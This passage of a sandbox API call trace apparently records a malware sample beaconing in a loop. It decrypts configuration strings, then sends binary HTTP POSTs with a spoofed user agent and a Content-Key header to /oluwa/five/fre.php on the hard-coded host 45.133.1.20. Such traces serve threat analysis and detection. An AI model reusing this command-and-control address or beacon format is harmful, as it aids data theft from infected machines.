sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0217.793] GetProcessHeap () returned 0x6a0000 [0217.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9a0 [0217.793] socket (af=2, type=1, protocol=6) returned 0x638 [0217.793] connect (s=0x638, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0217.876] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0217.877] GetProcessHeap () returned 0x6a0000 [0217.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0217.877] GetProcessHeap () returned 0x6a0000 [0217.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d8710 [0217.881] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0217.882] wvsprintfA (in: param_1=0x6d8710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0217.883] GetProcessHeap () returned 0x6a0000 [0217.883] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0217.883] GetProcessHeap () returned 0x6a0000 [0217.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8710 | out: hHeap=0x6a0000) returned 1 [0217.884] GetProcessHeap () returned 0x6a0000 [0217.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0217.884] GetProcessHeap () returned 0x6a0000 [0217.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d8710 [0217.884] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0217.885] wvsprintfA (in: param_1=0x6d8710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0217.885] GetProcessHeap () returned 0x6a0000 [0217.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0217.885] GetProcessHeap () returned 0x6a0000 [0217.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8710 | out: hHeap=0x6a0000) returned 1 [0217.886] send (s=0x638, buf=0x6b5c98*, len=242, flags=0) returned 242 [0217.887] send (s=0x638, buf=0x6bb998*, len=159, flags=0) returned 159 [0217.887] GetProcessHeap () returned 0x6a0000 [0217.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c66f8 [0217.887] recv (in: s=0x638, buf=0x6c66f8, len=4048, flags=0 | out: buf=0x6c66f8*) returned 204 [0217.972] GetProcessHeap () returned 0x6a0000 [0217.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0217.972] GetProcessHeap () returned 0x6a0000 [0217.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0217.973] GetProcessHeap () returned 0x6a0000 [0217.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0217.973] GetProcessHeap () returned 0x6a0000 [0217.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0217.974] closesocket (s=0x638) returned 0 [0217.974] GetProcessHeap () returned 0x6a0000 [0217.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9a0 | out: hHeap=0x6a0000) returned 1 [0217.974] GetProcessHeap () returned 0x6a0000 [0217.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0217.975] GetProcessHeap () returned 0x6a0000 [0217.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0217.975] GetProcessHeap () returned 0x6a0000 [0217.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0217.976] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c66f8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1364) returned 0x638 [0217.978] Sleep (dwMilliseconds=0xea60) [0217.980] GetProcessHeap () returned 0x6a0000 [0217.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0217.981] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.981] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0217.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.994] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0218.007] GetProcessHeap () returned 0x6a0000 [0218.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0218.008] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.008] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0218.009] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.009] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0218.010] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.010] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0218.010] GetProcessHeap () returned 0x6a0000 [0218.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0218.014] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.014] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0218.015] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.015] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0218.016] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.016] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0218.016] GetProcessHeap () returned 0x6a0000 [0218.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0218.021] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.021] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0218.022] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.022] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0218.023] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.023] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0218.024] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.024] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0218.024] GetProcessHeap () returned 0x6a0000 [0218.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0218.024] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0218.024] GetProcessHeap () returned 0x6a0000 [0218.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0218.025] GetProcessHeap () returned 0x6a0000 [0218.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0218.025] GetProcessHeap () returned 0x6a0000 [0218.025] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0218.025] GetProcessHeap () returned 0x6a0000 [0218.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0218.026] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.026] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0218.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.032] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0218.107] GetProcessHeap () returned 0x6a0000 [0218.108] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0218.108] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.109] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0218.109] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.110] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0218.110] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.111] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0218.111] GetProcessHeap () returned 0x6a0000 [0218.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0218.112] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.112] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0218.122] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.124] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0218.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.125] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0218.126] GetProcessHeap () returned 0x6a0000 [0218.126] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0218.126] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.126] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0218.127] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.127] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0218.128] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.128] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0218.129] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.129] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0218.129] GetProcessHeap () returned 0x6a0000 [0218.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0218.129] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0218.129] GetProcessHeap () returned 0x6a0000 [0218.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baab0 [0218.129] socket (af=2, type=1, protocol=6) returned 0x63c [0218.130] connect (s=0x63c, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0218.151] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0218.151] GetProcessHeap () returned 0x6a0000 [0218.151] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0218.151] GetProcessHeap () returned 0x6a0000 [0218.151] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d8710 [0218.151] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0218.152] wvsprintfA (in: param_1=0x6d8710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0218.153] GetProcessHeap () returned 0x6a0000 [0218.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0218.153] GetProcessHeap () returned 0x6a0000 [0218.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8710 | out: hHeap=0x6a0000) returned 1 [0218.153] GetProcessHeap () returned 0x6a0000 [0218.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0218.153] GetProcessHeap () returned 0x6a0000 [0218.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d8710 [0218.154] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0218.155] wvsprintfA (in: param_1=0x6d8710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0218.155] GetProcessHeap () returned 0x6a0000 [0218.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0218.155] GetProcessHeap () returned 0x6a0000 [0218.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8710 | out: hHeap=0x6a0000) returned 1 [0218.156] send (s=0x63c, buf=0x6b5c98*, len=242, flags=0) returned 242 [0218.156] send (s=0x63c, buf=0x6bb998*, len=159, flags=0) returned 159 [0218.156] GetProcessHeap () returned 0x6a0000 [0218.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c66f8 [0218.156] recv (in: s=0x63c, buf=0x6c66f8, len=4048, flags=0 | out: buf=0x6c66f8*) returned 204 [0218.225] GetProcessHeap () returned 0x6a0000 [0218.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0218.226] GetProcessHeap () returned 0x6a0000 [0218.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0218.226] GetProcessHeap () returned 0x6a0000 [0218.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0218.226] GetProcessHeap () returned 0x6a0000 [0218.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0218.227] closesocket (s=0x63c) returned 0 [0218.228] GetProcessHeap () returned 0x6a0000 [0218.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baab0 | out: hHeap=0x6a0000) returned 1 [0218.228] GetProcessHeap () returned 0x6a0000 [0218.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0218.228] GetProcessHeap () returned 0x6a0000 [0218.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0218.228] GetProcessHeap () returned 0x6a0000 [0218.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0218.229] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c66f8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xd34) returned 0x63c [0218.231] Sleep (dwMilliseconds=0xea60) [0218.233] GetProcessHeap () returned 0x6a0000 [0218.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0218.233] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.234] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0218.241] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.241] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0218.252] GetProcessHeap () returned 0x6a0000 [0218.252] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6d8148 [0218.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.254] CryptImportKey (in: hProv=0x6beb90, pbData=0x6d8148, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0218.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.258] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0218.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.259] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0218.259] GetProcessHeap () returned 0x6a0000 [0218.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8148 | out: hHeap=0x6a0000) returned 1 [0218.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.261] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0218.262] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.262] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0218.263] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.264] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0218.264] GetProcessHeap () returned 0x6a0000 [0218.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0218.264] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.265] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0218.269] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.273] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0218.274] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.274] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0218.275] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.276] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0218.276] GetProcessHeap () returned 0x6a0000 [0218.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0218.276] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0218.276] GetProcessHeap () returned 0x6a0000 [0218.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0218.277] GetProcessHeap () returned 0x6a0000 [0218.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0218.277] GetProcessHeap () returned 0x6a0000 [0218.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0218.277] GetProcessHeap () returned 0x6a0000 [0218.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0218.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.279] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0218.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.285] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0218.297] GetProcessHeap () returned 0x6a0000 [0218.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0218.300] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.301] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0218.302] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.302] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0218.303] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.303] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0218.303] GetProcessHeap () returned 0x6a0000 [0218.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0218.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.305] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0218.306] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.306] CryptDestroyKey (hKey=0x6ad020) returned 1 [0218.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0218.312] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0218.312] GetProcessHeap () returned 0x6a0000 [0218.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0218.313] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.314] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0218.314] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.315] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0218.316] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.316] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0218.317] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0218.331] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0218.331] GetProcessHeap () returned 0x6a0000 [0218.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0218.331] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0218.331] GetProcessHeap () returned 0x6a0000 [0218.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba970 [0218.331] socket (af=2, type=1, protocol=6) returned 0x640 [0218.331] connect (s=0x640, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0218.359] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0218.359] GetProcessHeap () returned 0x6a0000 [0218.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0218.359] GetProcessHeap () returned 0x6a0000 [0218.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 